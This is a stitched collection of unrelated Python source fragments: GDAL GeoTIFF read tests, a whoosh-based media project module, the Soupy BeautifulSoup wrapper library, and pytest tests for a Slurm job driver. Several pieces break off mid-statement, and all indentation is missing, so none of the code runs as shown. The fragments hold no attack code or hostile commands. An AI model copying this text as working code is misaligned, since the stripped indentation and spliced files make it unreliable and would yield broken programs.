# f2.write('%s\n' % str(struct.unpack('B' * 4 * xsize, got_nbands_data_native_type_upsampled[(b * 4 * ysize + y) * 4 * xsize : (b * 4 * ysize + y + 1) * 4 * xsize])))
pytest.fail(i)
if ref_nbands_data_native_type_downsampled_x_upsampled_y != got_nbands_data_native_type_downsampled_x_upsampled_y:
print(option)
# import struct
# f1 = open('out1.txt', 'wb')
# f2 = open('out2.txt', 'wb')
# for b in range(nbands):
# for y in range(32 * ysize):
# f1.write('%s\n' % str(struct.unpack('B' * int(xsize/2), ref_nbands_data_native_type_downsampled_x_upsampled_y[(b * 32 * ysize + y) * int(xsize/2) : (b * 32 * ysize + y + 1) * int(xsize/2)])))
# f2.write('%s\n' % str(struct.unpack('B' * int(xsize/2), got_nbands_data_native_type_downsampled_x_upsampled_y[(b * 32 * ysize + y) * int(xsize/2) : (b * 32 * ysize + y + 1) * int(xsize/2)])))
pytest.fail(i)
if ref_nbands_data_native_type_unordered_list != got_nbands_data_native_type_unordered_list:
print(option)
pytest.fail(i)
if ref_nbands_data_native_type_pixel_interleaved != got_nbands_data_native_type_pixel_interleaved:
print(option)
pytest.fail(i)
for y in range(ysize):
for x in range(xsize):
for b in range(nbands - 1):
for k in range(dt_size):
if ref_nbands_m_1_data_native_type_pixel_interleaved_with_extra_space[((y * xsize + x) * nbands + b) * dt_size + k] != got_nbands_m_1_data_native_type_pixel_interleaved_with_extra_space[((y * xsize + x) * nbands + b) * dt_size + k]:
print(option)
pytest.fail(i)
if ref_nbands_data_float32 != got_nbands_data_float32:
print(option)
pytest.fail(i)
if ref_nbands_data_float32_pixel_interleaved != got_nbands_data_float32_pixel_interleaved:
print(option)
pytest.fail(i)
ds = gdal.Open('data/byte.tif') # any GTiff file will do
unreached = ds.GetMetadataItem('UNREACHED_VIRTUALMEMIO_CODE_PATH', '_DEBUG_')
ds = None
if unreached:
print('unreached = %s' % unreached)
pytest.fail('missing code coverage in VirtualMemIO()')
###############################################################################
# Check read Digital Globe metadata IMD & RPB format
def test_tiff_read_md1():
try:
os.remove('data/md_dg.tif.aux.xml')
except OSError:
pass
ds = gdal.Open('data/md_dg.tif', gdal.GA_ReadOnly)
filelist = ds.GetFileList()
assert len(filelist) == 3, 'did not get expected file list.'
metadata = ds.GetMetadataDomainList()
assert len(metadata) == 6, 'did not get expected metadata list.'
md = ds.GetMetadata('IMAGERY')
assert 'SATELLITEID' in md, 'SATELLITEID not present in IMAGERY Domain'
assert 'CLOUDCOVER' in md, 'CLOUDCOVER not present in IMAGERY Domain'
assert 'ACQUISITIONDATETIME' in md, \
'ACQUISITIONDATETIME not present in IMAGERY Domain'
# Test UTC date
assert md['ACQUISITIONDATETIME'] == '2010-04-01 12:00:00', \
'bad value for IMAGERY[ACQUISITIONDATETIME]'
ds = None
assert not os.path.exists('data/md_dg.tif.aux.xml')
###############################################################################
# Check read Digital Globe metadata XML format
def test_tiff_read_md2():
try:
os.remove('data/md_dg_2.tif.aux.xml')
except OSError:
pass
ds = gdal.Open('data/md_dg_2.tif', gdal.GA_ReadOnly)
filelist = ds.GetFileList()
assert len(filelist) == 2, 'did not get expected file list.'
metadata = ds.GetMetadataDomainList()
assert len(metadata) == 6, 'did not get expected metadata list.'
md = ds.GetMetadata('IMAGERY')
assert 'SATELLITEID' in md, 'SATELLITEID not present in IMAGERY Domain'
assert 'CLOUDCOVER' in md, 'CLOUDCOVER not present in IMAGERY Domain'
assert 'ACQUISITIONDATETIME' in md, \
'ACQUISITIONDATETIME not present in IMAGERY Domain'
# Test UTC date
assert md['ACQUISITIONDATETIME'] == '2011-05-01 13:00:00', \
'bad value for IMAGERY[ACQUISITIONDATETIME]'
ds = None
assert not os.path.exists('data/md_dg_2.tif.aux.xml')
###############################################################################
# Check read GeoEye metadata format
def test_tiff_read_md3():
try:
os.remove('data/md_ge_rgb_0010000.tif.aux.xml')
except OSError:
pass
ds = gdal.Open('data/md_ge_rgb_0010000.tif', gdal.GA_ReadOnly)
filelist = ds.GetFileList()
assert len(filelist) == 3, 'did not get expected file list.'
metadata = ds.GetMetadataDomainList()
assert len(metadata) == 6, 'did not get expected metadata list.'
md = ds.GetMetadata('IMAGERY')
assert 'SATELLITEID' in md, 'SATELLITEID not present in IMAGERY Domain'
assert 'CLOUDCOVER' in md, 'CLOUDCOVER not present in IMAGERY Domain'
assert 'ACQUISITIONDATETIME' in md, \
'ACQUISITIONDATETIME not present in IMAGERY Domain'
# Test UTC date
assert md['ACQUISITIONDATETIME'] == '2012-06-01 14:00:00', \
'bad value for IMAGERY[ACQUISITIONDATETIME]'
ds = None
assert not os.path.exists('data/md_ge_rgb_0010000.tif.aux.xml')
###############################################################################
# Check read OrbView metadata format
def test_tiff_read_md4():
try:
os.remove('data/md_ov.tif.aux.xml')
except OSError:
pass
ds = gdal.Open('data/md_ov.tif', gdal.GA_ReadOnly)
filelist = ds.GetFileList()
assert len(filelist) == 3, 'did not get expected file list.'
metadata = ds.GetMetadataDomainList()
assert len(metadata) == 6, 'did not get expected metadata list.'
md = ds.GetMetadata('IMAGERY')
assert 'SATELLITEID' in md, 'SATELLITEID not present | |
import datetime
import io
import json_tricks
import logging
import os
from os.path import (abspath, basename, dirname, exists, expanduser,
join, realpath, relpath, splitext)
import re
import shutil
import sys
from traits.api import (Any, Dict, Enum, HasTraits, Instance, List, Long,
Str)
from whoosh import fields, qparser, query
from whoosh.util.times import datetime_to_long, long_to_datetime
from .common import get_project_dir
from .media import Media, MediaData, get_media_data
from .directory import Directory
from . import processor
logger = logging.getLogger(__name__)
if sys.version_info[0] > 2:
unicode = str
string_types = (str,)
import csv
else:
string_types = (basestring,)
import backports.csv as csv
INT = fields.NUMERIC(numtype=int)
FLOAT = fields.NUMERIC(numtype=float)
def get_file_saved_time(path):
dt = datetime.datetime.fromtimestamp(os.stat(path).st_ctime)
return dt.ctime()
def _get_sample(fname):
sample = ''
with io.open(fname, 'r', newline='', encoding='utf-8') as fp:
sample += fp.readline() + fp.readline()
return sample
def _get_csv_headers(fname):
sample = _get_sample(fname)
sniffer = csv.Sniffer()
has_header = sniffer.has_header(sample)
dialect = sniffer.sniff(sample)
with io.open(fname, 'r', newline='', encoding='utf-8') as fp:
reader = csv.reader(fp, dialect)
header = next(reader)
return has_header, header, dialect
class TagInfo(HasTraits):
name = Str
type = Enum("string", "text", "int", "float", "bool")
default = Any
def __repr__(self):
return 'TagInfo(%r, %r)' % (self.name, self.type)
def _default_default(self):
map = {"string": "", "text": "", "int": 0, "float": 0.0,
"bool": False}
return map[self.type]
def open_file(fname_or_file, mode='rb'):
if hasattr(fname_or_file, 'read'):
return fname_or_file
else:
return open(fname_or_file, mode)
def sanitize_name(name):
name = name.lower()
name = re.sub(r'\s+', '_', name)
return re.sub(r'\W+', '', name)
def get_non_existing_filename(fname):
if exists(fname):
base, ext = splitext(basename(fname))
return join(dirname(fname), base + '_a' + ext)
else:
return fname
COMMON_TAGS = dict(
file_name='string', path='string', relpath='string',
ctime='string', mtime='string', size='int', type='string'
)
def _cleanup_query(q, tag_types):
type_map = dict(float=FLOAT.from_bytes, int=INT.from_bytes)
for term in q.leaves():
if isinstance(term, query.Term):
if isinstance(term.text, (str, unicode, bytes)):
fieldtype = tag_types[term.fieldname]
if fieldtype in type_map:
term.text = type_map[fieldtype](term.text)
else:
term.text = term.text.lower()
elif isinstance(term, query.Phrase):
term.words = [x.lower() for x in term.words]
def _check_value(value, expr):
if isinstance(expr, string_types):
return expr in value.lower()
else:
return expr == value
def _check_range(x, term):
result = True
if term.start is not None:
if term.startexcl:
result &= x > term.start
else:
result &= x >= term.start
if term.end is not None and result:
if term.endexcl:
result &= x < term.end
else:
result &= x <= term.end
return result
def _check_date_range(x, term):
result = True
if term.startdate is not None:
result &= x >= term.start
if term.enddate is not None and result:
result &= x <= term.end
return result
def _search_media(expr, m_key, get_tag):
"""Given search expression, index to media, and a getter to get the attribute
check if the media matches expression.
"""
if expr.is_leaf():
if isinstance(expr, query.Term):
attr = expr.fieldname
return _check_value(get_tag(m_key, attr), expr.text)
elif isinstance(expr, query.Phrase):
attr = expr.fieldname
text = " ".join(expr.words)
return _check_value(get_tag(m_key, attr), text)
elif isinstance(expr, query.DateRange):
if expr.fieldname == 'ctime':
value = get_tag(m_key, 'ctime_')
elif expr.fieldname == 'mtime':
value = get_tag(m_key, 'mtime_')
return _check_date_range(value, expr)
elif isinstance(expr, query.NumericRange):
attr = expr.fieldname
return _check_range(get_tag(m_key, attr), expr)
else:
print("Unsupported term: %r" % expr)
return False
else:
if isinstance(expr, query.And):
result = True
for child in expr.children():
result &= _search_media(child, m_key, get_tag)
if not result:
break
return result
elif isinstance(expr, query.Or):
result = False
for child in expr.children():
result |= _search_media(child, m_key, get_tag)
if result:
break
return result
elif isinstance(expr, query.Not):
subquery = list(expr.children())[0]
return not _search_media(subquery, m_key, get_tag)
else:
print("Unsupported term: %r" % expr)
return False
class Project(HasTraits):
name = Str
description = Str
path = Str
root = Instance(Directory)
tags = List(TagInfo)
_media = Dict(Str, Media)
extensions = List(Str)
processors = List(processor.FactoryBase)
number_of_files = Long
# Path where the project data is saved.
save_file = Str
last_save_time = Str
_data = Dict
_tag_data = Dict
_relpath2index = Dict()
_query_parser = Instance(qparser.QueryParser)
def add_tags(self, tags):
tags = list(self.tags) + tags
self.update_tags(tags)
def update_tags(self, new_tags):
old_tags = self.tags
new_tag_names = set(tag.name for tag in new_tags)
tag_info = dict((tag.name, tag.type) for tag in old_tags)
removed = []
added = []
for tag in new_tags:
if tag.name not in tag_info:
added.append(tag)
elif tag_info[tag.name] != tag.type:
removed.append(tag)
added.append(tag)
for tag in old_tags:
if tag.name not in new_tag_names:
removed.append(tag)
for tag in removed:
del self._tag_data[tag.name]
n_entries = len(self._relpath2index)
for tag in added:
self._tag_data[tag.name] = [tag.default]*n_entries
# The above can be the first time when self._tag_data is accessed, when
# creating a new project for example. In this case,
# self.__tag_data_default is called, so if self.tags is set then the
# removed tags will not exist in _tag_data causing an error. So we only
# set self.tags below.
self.tags = new_tags
# Update the cached media
for m in self._media.values():
for tag in removed:
del m.tags[tag.name]
for tag in added:
m.tags[tag.name] = tag.default
self._query_parser = self._make_query_parser()
def copy(self):
"""Make a copy of this project. This does not copy the data but only
the tags, extensions and the other settings of the project.
This will not copy any of the processor states but only their settings.
"""
name = self.name + ' copy'
p = Project(name=name)
traits = ['description', 'extensions', 'path', 'processors', 'tags']
p.copy_traits(self, traits, copy='deep')
# Clear out the _done information from the processors
for proc in p.processors:
proc._done.clear()
return p
# #### CRUD interface to the data ####
def update(self, media_data, tags=None):
"""Create/update the internal data given the media data and tags.
Parameters
----------
f: vixen.directory.File instance
tags: dict
"""
relpath = media_data.relpath
if not self.has_media(relpath):
index = len(self._relpath2index)
self._relpath2index[relpath] = index
for key in MediaData._fields:
self._data[key].append(None)
for tag in self.tags:
self._tag_data[tag.name].append(tag.default)
index = self._relpath2index[relpath]
for i, key in enumerate(MediaData._fields):
self._data[key][index] = media_data[i]
if tags:
for key, value in tags.items():
self._tag_data[key][index] = value
media = self._media.get(relpath)
if media is not None:
media.update(media_data, tags)
def get(self, relpath):
"""Given the relative path of some media, return a Media instance.
"""
if relpath in self._media:
return self._media[relpath]
else:
data = {}
index = self._relpath2index[relpath]
for key in MediaData._fields:
data[key] = self._data[key][index]
tags = {}
for key in self._tag_data:
tags[key] = self._tag_data[key][index]
media = Media.from_data(MediaData(**data), tags)
media.on_trait_change(self._media_tag_handler, 'tags_items')
self._media[relpath] = media
return media
def remove(self, relpaths):
"""Given a list of relative path of some media, remove them from the
database.
"""
relpath2index = self._relpath2index
indices = [(x, relpath2index[x]) for x in relpaths]
for relpath, index in sorted(indices, reverse=True):
last = len(relpath2index) - 1
if index == last:
self._delete_record(last, relpath)
else:
self._replace_with_last_record(index, last)
self._delete_record(last, relpath)
def has_media(self, relpath):
"""Returns True if the media data is available.
"""
return relpath in self._relpath2index
def keys(self):
"""Return all the keys for the media relative paths."""
return self._relpath2index.keys()
def _get_media_attr(self, index, attr):
"""Given an index to the media, return its value.
"""
if attr in self._data:
return self._data[attr][index]
elif attr in self._tag_data:
return self._tag_data[attr][index]
# #### End of CRUD interface to the data ####
def clean(self):
"""Scan the project and remove any dead entries.
This is useful when you remove or rename files. This does not refresh
the directory tree or set the number of files. It simply cleans up the
db of files that no longer exist.
"""
logger.info('Cleaning project: %s', self.name)
root_path = self.path
to_remove = []
relpath2index = self._relpath2index
for rpath in list(relpath2index.keys()):
fname = os.path.join(root_path, rpath)
if not os.path.exists(fname):
to_remove.append(rpath)
self.remove(to_remove)
def export_csv(self, fname, cols=None):
"""Export metadata to a csv file. If `cols` are not specified,
it writes out all the useful metadata.
Parameters
-----------
fname: str: a path to the csv file to dump.
cols: sequence: a sequence of columns to write.
"""
logger.info('Exporting CSV: %s', fname)
all_keys = ((set(MediaData._fields) | set(self._tag_data.keys()))
- set(('ctime_', 'mtime_')))
if cols is None:
cols = all_keys
cols = list(sorted(cols))
data_cols = set([x for x in cols if x in self._data])
with io.open(fname, 'w', newline='', encoding='utf-8') as of:
# Write the header.
writer = csv.writer(of)
writer.writerow(cols)
for i in range(len(self._relpath2index)):
line = []
for col in cols:
if col in data_cols:
elem = self._data[col][i]
else:
elem = self._tag_data[col][i]
line.append(elem)
writer.writerow(line)
def import_csv(self, fname):
"""Read tag information from given CSV filename.
Returns the success status and the error message if any. Note that this
only applies tags for column headers with known tags. Unknown tags are
not added.
Parameters
----------
fname : str Input filename.
"""
logger.info('Importing tags from: %s', fname)
has_header, | |
from __future__ import print_function, division, unicode_literals
from abc import ABCMeta, abstractproperty, abstractmethod
from collections import namedtuple
from distutils.version import LooseVersion
from functools import wraps
from itertools import takewhile, dropwhile
import operator
import re
import sys
try:
from bs4 import BeautifulSoup, PageElement, NavigableString
except ImportError: # pragma: no cover
raise ImportError("Soupy requires beautifulsoup4")
try:
import six
from six.moves import map
assert LooseVersion(six.__version__) >= LooseVersion('1.9')
except(ImportError, AssertionError): # pragma: no cover
raise ImportError("Soupy requires six version 1.9 or later")
__version__ = '0.4.dev'
__all__ = ['Soupy', 'Q', 'Node', 'Scalar', 'Collection',
'Null', 'NullNode', 'NullCollection',
'either', 'NullValueError', 'QDebug']
# extract the thing inside string reprs (eg u'abc' -> abc)
QUOTED_STR = re.compile("^[ub]?['\"](.*?)['\"]$")
QDebug = namedtuple('QDebug', ('expr', 'inner_expr', 'val', 'inner_val'))
"""Namedtuple that holds information about a failed expression evaluation."""
@six.add_metaclass(ABCMeta)
class Wrapper(object):
@abstractmethod
def val(self):
pass # pragma: no cover
@abstractmethod
def orelse(self, value):
pass # pragma: no cover
def nonnull(self):
"""
Require that a node is not null
Null values will raise NullValueError, whereas nonnull
values return self.
useful for being strict about portions of queries.
Examples:
node.find('a').nonnull().find('b').orelse(3)
This will raise an error if find('a') doesn't match,
but provides a fallback if find('b') doesn't match.
"""
return self
@abstractmethod
def isnull(self):
pass # pragma: no cover
@abstractmethod
def map(self, func):
pass # pragma: no cover
@abstractmethod
def apply(self, func):
pass # pragma: no cover
@classmethod
def wrap(cls, value):
"""
Wrap value in the appropriate wrapper class,
based upon its type.
"""
if isinstance(value, Wrapper):
return value
if hasattr(value, 'children'):
return Node(value)
return Scalar(value)
def __getitem__(self, key):
return self.map(operator.itemgetter(key))
def dump(self, *args, **kwargs):
"""
Extract derived values into a Scalar(tuple) or Scalar(dict)
The keyword names passed to this function become keys in
the resulting dictionary, while positional arguments passed to
this function become elements in the resulting tuple.
The positional arguments and keyword values are functions that
are called on this Node.
Notes:
- The input functions are called on the Node, **not** the
underlying BeautifulSoup element
- If the function returns a wrapper, it will be unwrapped
- Only either positional arguments or keyword arguments may
be passed, not both.
Example:
>>> soup = Soupy("<b>hi</b>").find('b')
>>> data = soup.dump(name=Q.name, text=Q.text).val()
>>> data == {'text': 'hi', 'name': 'b'}
True
>> name, text = soup.dump(Q.name, Q.text).val()
>> (name, text) == ('hi', 'b')
True
"""
if args and kwargs:
raise ValueError('Cannot pass both arguments and keywords to dump')
if args:
result = tuple(_unwrap(self.apply(func)) for func in args)
else:
result = dict((name, _unwrap(self.apply(func)))
for name, func in kwargs.items())
return Wrapper.wrap(result)
@abstractmethod
def require(self, func, msg='Requirement Violated'):
pass # pragma: no cover
class NullValueError(ValueError):
"""
The NullValueError exception is raised when attempting
to extract values from Null objects
"""
pass
class QKeyError(KeyError):
"""
A custom KeyError subclass that better formats
exception messages raised inside expressions
"""
def __str__(self):
parts = self.args[0].split('\n\n\t')
return parts[0] + '\n\n\t' + _dequote(repr(parts[1]))
QKeyError.__name__ = str('KeyError')
@six.python_2_unicode_compatible
class BaseNull(Wrapper):
"""
This is the base class for null wrappers. Null values are returned
when the result of a function is ill-defined.
"""
def val(self):
"""
Raise :class:`NullValueError`
"""
raise NullValueError()
def orelse(self, value):
"""
Wraps value and returns the result
"""
return Wrapper.wrap(value)
def map(self, func):
"""
Returns :class:`Null`
"""
return self
def apply(self, func):
"""
Returns :class:`Null`
"""
return self
def nonnull(self):
"""
Raises :class:`NullValueError`
"""
raise NullValueError()
def require(self, func, msg="Requirement is violated (wrapper is null)"):
"""
Raises :class:`NullValueError`
"""
raise NullValueError()
def isnull(self):
"""
Return Scalar(True) if this item is a null value
"""
return Scalar(True)
def __setitem__(self, key, val):
pass
def __bool__(self):
return False
__nonzero__ = __bool__
def __str__(self):
return "%s()" % type(self).__name__
__repr__ = __str__
def __hash__(self):
return hash(type(self))
def __eq__(self, other):
return type(self)()
def __ne__(self, other):
return type(self)()
@six.python_2_unicode_compatible
class Some(Wrapper):
def __init__(self, value):
self._value = value
def map(self, func):
"""
Call a function on a wrapper's value, and wrap the result if necessary.
Parameters:
func : function(val) -> val
Examples:
>>> s = Scalar(3)
>>> s.map(Q * 2)
Scalar(6)
"""
return Wrapper.wrap(_make_callable(func)(self._value))
def apply(self, func):
"""
Call a function on a wrapper, and wrap the result if necessary.
Parameters:
func: function(wrapper) -> val
Examples:
>>> s = Scalar(5)
>>> s.apply(lambda val: isinstance(val, Scalar))
Scalar(True)
"""
return Wrapper.wrap(_make_callable(func)(self))
def orelse(self, value):
"""
Provide a fallback value for failed matches.
Examples:
>>> Scalar(5).orelse(10).val()
5
>>> Null().orelse(10).val()
10
"""
return self
def val(self):
"""
Return the value inside a wrapper.
Raises :class:`NullValueError` if called on a Null object
"""
return self._value
def require(self, func, msg="Requirement violated"):
"""
Assert that self.apply(func) is True.
Parameters:
func : func(wrapper)
msg : str
The error message to display on failure
Returns:
If self.apply(func) is True, returns self.
Otherwise, raises NullValueError.
"""
if self.apply(func):
return self
raise NullValueError(msg)
def isnull(self):
"""
Return Scalar(True) if this item is a null value
"""
return Scalar(False)
def __str__(self):
# returns unicode
# six builds appropriate py2/3 methods from this
return "%s(%s)" % (type(self).__name__, _repr(self._value))
def __repr__(self):
return repr(self.__str__())[1:-1] # trim off quotes
def __setitem__(self, key, val):
return self.map(Q.__setitem__(key, val))
def __hash__(self):
return hash(self._value)
def __eq__(self, other):
return self.map(lambda x: x == other)
def __ne__(self, other):
return self.map(lambda x: x != other)
class Null(BaseNull):
"""
The class for ill-defined Scalars.
"""
def __getattr__(self, attr):
return Null()
def __call__(self, *args, **kwargs):
return Null()
def __gt__(self, other):
return Null()
def __ge__(self, other):
return Null()
def __lt__(self, other):
return Null()
def __le__(self, other):
return Null()
def __len__(self):
raise TypeError("Null has no len()")
def __add__(self, other):
return Null()
def __sub__(self, other):
return Null()
def __mul__(self, other):
return Null()
def __div__(self, other):
return Null()
def __floordiv__(self, other):
return Null()
def __pow__(self, other):
return Null()
def __mod__(self, other):
return Null()
def __truediv__(self, other):
return Null()
def __hash__(self):
return super(Null, self).__hash__()
class Scalar(Some):
"""
A wrapper around single values.
Scalars support boolean testing (<, ==, etc), and
use the wrapped value in the comparison. They return
the result as a Scalar(bool).
Calling a Scalar calls the wrapped value, and wraps
the result.
Examples:
>>> s = Scalar(3)
>>> s > 2
Scalar(True)
>>> s.val()
3
>>> s + 5
Scalar(8)
>>> s + s
Scalar(6)
>>> bool(Scalar(3))
True
>>> Scalar(lambda x: x+2)(5)
Scalar(7)
"""
def __getattr__(self, attr):
return self.map(operator.attrgetter(attr))
def __call__(self, *args, **kwargs):
return self.map(operator.methodcaller('__call__', *args, **kwargs))
def __gt__(self, other):
return self.map(lambda x: x > other)
def __ge__(self, other):
return self.map(lambda x: x >= other)
def __lt__(self, other):
return self.map(lambda x: x < other)
def __le__(self, other):
return self.map(lambda x: x <= other)
def __bool__(self):
return bool(self._value)
__nonzero__ = __bool__
def __len__(self):
return len(self._value)
def __add__(self, other):
if isinstance(other, BaseNull):
return other
return self.map(Q + _unwrap(other))
def __sub__(self, other):
if isinstance(other, BaseNull):
return other
return self.map(Q - _unwrap(other))
def __mul__(self, other):
if isinstance(other, BaseNull):
return other
return self.map(Q * _unwrap(other))
def __div__(self, other):
if isinstance(other, BaseNull):
return other
return self.map(Q / _unwrap(other))
def __floordiv__(self, other):
if isinstance(other, BaseNull):
return other
return self.map(Q // _unwrap(other))
def __pow__(self, other):
if isinstance(other, BaseNull):
return other
return self.map(Q ** _unwrap(other))
def __mod__(self, other):
if isinstance(other, BaseNull):
return other
return self.map(Q % _unwrap(other))
def __truediv__(self, other):
if isinstance(other, BaseNull):
return other
return self.map(Q / _unwrap(other))
class Collection(Some):
"""
Collection's store lists of other wrappers.
They support most of the list methods (len, iter, getitem, etc).
"""
def __init__(self, items):
super(Collection, self).__init__(list(items))
self._items = self._value
self._assert_items_are_wrappers()
def _assert_items_are_wrappers(self):
for item in self:
if not isinstance(item, Wrapper):
raise TypeError("Collection can only hold other wrappers")
def val(self):
"""
Unwraps each item in the collection, and returns as a list
"""
return list(self.iter_val())
def first(self):
"""
Return the first element of the collection, or :class:`Null`
"""
return self[0]
def iter_val(self):
"""
An iterator version of :meth:`val`
"""
return (item.val() for item in self._items)
def each(self, *funcs):
"""
Call `func` on each element in the collection.
If multiple functions are provided, each item
in the output will be a tuple of each
func(item) in self.
Returns a new Collection.
Example:
>>> col = Collection([Scalar(1), Scalar(2)])
>>> col.each(Q * 10)
Collection([Scalar(10), Scalar(20)])
>>> col.each(Q * 10, Q - 1)
Collection([Scalar((10, | |
<filename>tests/driver/test_slurm_driver.py
import os
import shutil
from datetime import timedelta, datetime, date
from typing import Collection, Iterator
from unittest.mock import Mock, ANY, call
import pytest
from kong import util
from kong.config import Config, slurm_schema
from kong.drivers import InvalidJobStatus
from kong.drivers.slurm_driver import (
SlurmInterface,
SlurmDriver,
SlurmAccountingItem,
ShellSlurmInterface,
)
from kong.model.folder import Folder
from kong.model.job import Job
from kong.util import is_executable, exhaust
@pytest.fixture
def driver(monkeypatch, state):
# set some config values
data = state.config.data.copy()
data["slurm_driver"] = dict(
account="pseudo_account", node_size=42, default_queue="somequeue"
)
state.config = Config(data)
monkeypatch.setattr(SlurmInterface, "__abstractmethods__", set())
monkeypatch.setattr(ShellSlurmInterface, "__init__", Mock(return_value=None))
sif = ShellSlurmInterface()
return SlurmDriver(state.config, sif)
def test_sacct_parse(driver, monkeypatch, state):
sacct_output = """
5205197|FAILED|2:0|2020-03-17T10:10:35|2020-03-17T10:16:23|2020-03-17T14:16:48|z0021
5205197.batch|FAILED|2:0|2020-03-17T10:10:35|2020-03-17T10:16:23|2020-03-17T14:16:48|z0021
5205197.extern|COMPLETED|0:0|2020-03-17T10:10:35|2020-03-17T10:16:23|2020-03-17T14:16:48|z0021
5205197.0|FAILED|2:0|2020-03-17T10:10:35|2020-03-17T10:16:23|2020-03-17T14:16:48|z0021
5205206|FAILED|2:0|2020-03-18T10:10:35|2020-03-18T10:16:23|2020-03-18T14:16:48|z0022
5205206.batch|FAILED|2:0|2020-03-18T10:10:35|2020-03-18T10:16:23|2020-03-18T14:16:48|z0022
5205206.extern|COMPLETED|0:0|2020-03-18T10:10:35|2020-03-18T10:16:23|2020-03-18T14:16:48|z0022
5205206.0|FAILED|2:0|2020-03-18T10:10:35|2020-03-18T10:16:23|2020-03-18T14:16:48|z0022
5205209|FAILED|2:0|2020-03-19T10:10:35|2020-03-19T10:16:23|2020-03-19T14:16:48|z0023
5205209.batch|FAILED|2:0|2020-03-19T10:10:35|2020-03-19T10:16:23|2020-03-19T14:16:48|z0023
5205209.extern|COMPLETED|0:0|2020-03-19T10:10:35|2020-03-19T10:16:23|2020-03-19T14:16:48|z0023
5205209.0|FAILED|2:0|2020-03-19T10:10:35|2020-03-19T10:16:23|2020-03-19T14:16:48|z0023
5205223|FAILED|13:0|2020-03-20T10:10:35|2020-03-20T10:16:23|2020-03-20T14:16:48|z0024
5205223.batch|FAILED|13:0|2020-03-20T10:10:35|2020-03-20T10:16:23|2020-03-20T14:16:48|z0024
5205223.extern|COMPLETED|0:0|2020-03-20T10:10:35|2020-03-20T10:16:23|2020-03-20T14:16:48|z0024
5205223.0|FAILED|13:0|2020-03-20T10:10:35|2020-03-20T10:16:23|2020-03-20T14:16:48|z0024
5205350|FAILED|13:0|2020-03-21T10:10:35|2020-03-21T10:16:23|2020-03-21T14:16:48|z0025
5205350.batch|FAILED|13:0|2020-03-21T10:10:35|2020-03-21T10:16:23|2020-03-21T14:16:48|z0025
5205350.extern|COMPLETED|0:0|2020-03-21T10:10:35|2020-03-21T10:16:23|2020-03-21T14:16:48|z0025
5205350.0|FAILED|13:0|2020-03-21T10:10:35|2020-03-21T10:16:23|2020-03-21T14:16:48|z0025
5205355|PENDING|0:0|2020-03-22T10:10:35|||
5205757|COMPLETED|0:0|2020-03-23T10:10:35|2020-03-23T10:16:23|2020-03-23T14:16:48|z0026
5205757.batch|COMPLETED|0:0|2020-03-23T10:10:35|2020-03-23T10:16:23|2020-03-23T14:16:48|z0026
5205757.extern|COMPLETED|0:0|2020-03-23T10:10:35|2020-03-23T10:16:23|2020-03-23T14:16:48|z0026
5205757.0|COMPLETED|0:0|2020-03-23T10:10:35|2020-03-23T10:16:23|2020-03-23T14:16:48|z0026
22822|NOCLUE|0:0||2020-03-17T10:10:35||
""".strip()
with monkeypatch.context() as m:
mock = Mock(return_value=sacct_output.split("\n"))
m.setattr(driver.slurm, "_sacct", mock)
td = timedelta(days=10)
res = list(driver.slurm.sacct([], td))
starttime = date.today() - td
mock.assert_called_once_with(
format="JobID,State,ExitCode,Submit,Start,End,NodeList",
noheader=True,
parsable2=True,
starttime=starttime,
_iter=True,
)
db = datetime(2020, 3, 17, 10, 10, 35)
def fmt(dt):
return dt.strftime("%Y-%m-%dT%H:%M:%S")
def make_other(d, host):
return dict(
submit=fmt(d),
start=fmt(d.replace(minute=16, second=23)),
end=fmt(d.replace(hour=14, minute=16, second=48)),
node=host,
)
ref = [
SlurmAccountingItem(
5_205_197, Job.Status.FAILED, 2, other=make_other(db, "z0021")
),
SlurmAccountingItem(
5_205_206,
Job.Status.FAILED,
2,
other=make_other(db.replace(day=18), "z0022"),
),
SlurmAccountingItem(
5_205_209,
Job.Status.FAILED,
2,
other=make_other(db.replace(day=19), "z0023"),
),
SlurmAccountingItem(
5_205_223,
Job.Status.FAILED,
13,
other=make_other(db.replace(day=20), "z0024"),
),
SlurmAccountingItem(
5_205_350,
Job.Status.FAILED,
13,
other=make_other(db.replace(day=21), "z0025"),
),
SlurmAccountingItem(
5_205_355,
Job.Status.SUBMITTED,
0,
other={
"submit": fmt(db.replace(day=22)),
"start": None,
"end": None,
"node": None,
},
),
SlurmAccountingItem(
5_205_757,
Job.Status.COMPLETED,
0,
other=make_other(db.replace(day=23), "z0026"),
),
SlurmAccountingItem(
22822,
Job.Status.UNKNOWN,
0,
other={
"submit": None,
"start": fmt(db.replace(day=17)),
"end": None,
"node": None,
},
),
]
assert len(ref) == len(res)
for a, b in zip(ref, res):
assert a == b
assert a.other == b.other
batch_job_id = 5_207_375
sbatch = Mock(return_value=f"Submitted batch job {batch_job_id}")
m.setattr(driver.slurm, "_sbatch", sbatch)
job = Job()
job.data["batchfile"] = "somefile.sh"
jid = driver.slurm.sbatch(job)
sbatch.assert_called_once_with("somefile.sh")
assert jid == batch_job_id
job.batch_job_id = jid
scancel = Mock()
m.setattr(driver.slurm, "_scancel", scancel)
driver.slurm.scancel(job)
scancel.assert_called_once_with(batch_job_id)
def test_repr():
sai = SlurmAccountingItem(1, Job.Status.UNKNOWN, 0, {})
assert repr(sai) != ""
def test_create_job(driver, state):
root = Folder.get_root()
j1 = driver.create_job(
command="sleep 1",
folder=root,
cores=1,
name="job1",
queue="somequeue",
walltime=timedelta(hours=5),
)
assert j1.status == Job.Status.CREATED
assert len(root.jobs) == 1 and root.jobs[0] == j1
assert j1.batch_job_id is None
assert os.path.exists(j1.data["log_dir"])
assert os.path.exists(j1.data["output_dir"])
assert os.path.exists(j1.data["jobscript"])
assert os.path.exists(j1.data["batchfile"])
assert is_executable(j1.data["jobscript"])
j2 = driver.create_job(
command="sleep 1", walltime="03:00:00", folder=root, licenses="bliblablubb"
)
assert j2.data["walltime"] == "03:00:00"
with open(j2.data["jobscript"]) as f:
jobscript = f.read()
assert str(j2.job_id) in jobscript
assert str(j2.cores) in jobscript
assert j2.command in jobscript
for v in ["output_dir", "log_dir", "stdout"]:
assert j2.data[v] in jobscript
with open(j2.data["batchfile"]) as f:
batchfile = f.read()
assert str(j2.cores) in batchfile
assert str(j2.memory) in batchfile
for v in [
"name",
"slurm_out",
"queue",
"ntasks",
"nnodes",
"walltime",
"account",
"jobscript",
"licenses",
]:
assert str(j2.data[v]) in batchfile
with pytest.raises(ValueError):
driver.create_job(command="sleep 1", walltime="100:00:00", folder=root)
with pytest.raises(ValueError):
driver.create_job(command="sleep 1", walltime=42, folder=root)
def test_submit_job(driver, state, monkeypatch):
root = Folder.get_root()
